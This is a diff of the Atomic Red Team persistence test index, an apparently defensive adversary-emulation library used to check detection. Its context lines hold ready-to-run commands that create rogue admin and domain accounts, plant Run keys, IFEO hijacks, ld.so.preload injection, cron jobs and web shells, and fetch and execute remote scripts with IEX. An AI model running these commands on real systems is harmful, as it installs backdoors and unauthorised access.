@@ -38170,10 +38170,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -38281,31 +38281,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -38398,7 +38398,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -38414,30 +38414,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -38534,7 +38534,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -38699,10 +38699,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -38726,10 +38726,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -38767,7 +38767,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -38799,10 +38799,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 -' + ' name: command_prompt T1547: technique: @@ -39127,7 +39127,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -39147,7 +39147,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -39267,7 +39267,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -39312,7 +39312,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -39350,7 +39350,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -39467,10 +39467,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -39540,7 +39540,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time -' + ' supported_platforms: - iaas:aws input_arguments: @@ -39551,21 +39551,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: 'cat ~/.aws/credentials | grep "default" -' + ' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: 'aws iam create-user --user-name #{username} -' + ' cleanup_command: 'aws iam delete-user --user-name #{username} -' + ' name: sh elevation_required: false T1078.004: @@ -39861,7 +39861,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -39872,17 +39872,17 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -39894,7 +39894,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: 
@@ -39905,20 +39905,20 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1136: @@ -40100,7 +40100,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -40120,7 +40120,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -40128,7 +40128,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -40160,7 +40160,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -40177,10 +40177,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
@@ -40355,10 +40355,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -40366,7 +40366,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -40478,16 +40478,16 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows executor: command: 'net user guest /active:yes -' + ' cleanup_command: 'net user guest /active:no -' + ' name: command_prompt elevation_required: true T1136.002: @@ -40539,7 +40539,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -40561,14 +40561,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -40583,10 +40583,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell 
@@ -40594,7 +40594,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -40623,7 +40623,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" -' + ' name: powershell elevation_required: false T1078.002: @@ -40986,21 +40986,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -41025,18 +41025,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1546.014: technique: @@ -41097,7 +41097,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -41386,7 +41386,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: 
@@ -41399,12 +41399,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -41624,7 +41624,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -41640,19 +41640,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -41836,7 +41836,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -41860,10 +41860,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -41872,7 +41872,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} 
@@ -42078,7 +42078,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -42095,15 +42095,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -42197,7 +42197,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -42214,15 +42214,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -42366,7 +42366,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -42377,17 +42377,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: 
@@ -42409,7 +42409,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -42431,10 +42431,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -42452,10 +42452,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -42463,7 +42463,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -42481,14 +42481,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -42506,7 +42506,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -42634,7 +42634,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: 
@@ -42863,7 +42863,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -42874,7 +42874,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1556.004: technique: @@ -43243,11 +43243,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" -' + ' name: command_prompt T1137.003: technique: @@ -43382,11 +43382,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f -' + ' T1137.005: technique: external_references: @@ -43507,7 +43507,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -43520,14 +43520,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -43943,7 +43943,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: 
@@ -44155,10 +44155,10 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" -' + ' name: command_prompt elevation_required: true T1546.013: @@ -44244,7 +44244,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -44260,13 +44260,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -44484,14 +44484,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -44507,12 +44507,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -44528,7 +44528,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -44654,10 +44654,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: 
@@ -44852,11 +44852,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -44874,11 +44874,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -44904,7 +44904,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -45125,10 +45125,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -45226,7 +45226,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -45243,10 +45243,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | 
@@ -45282,11 +45282,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -45308,7 +45308,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -45325,7 +45325,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -45336,7 +45336,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -45349,7 +45349,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -45361,7 +45361,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -45497,7 +45497,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: 
@@ -45807,7 +45807,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -45827,22 +45827,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -45915,7 +45915,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -46016,10 +46016,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -46196,7 +46196,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -46269,15 +46269,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true 
@@ -46714,13 +46714,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -46932,7 +46932,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -46944,13 +46944,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -46962,7 +46962,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1078: technique: @@ -47131,10 +47131,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -47143,7 +47143,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} -' + ' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -47416,10 +47416,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -47452,10 +47452,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -47551,11 +47551,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -47574,11 +47574,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
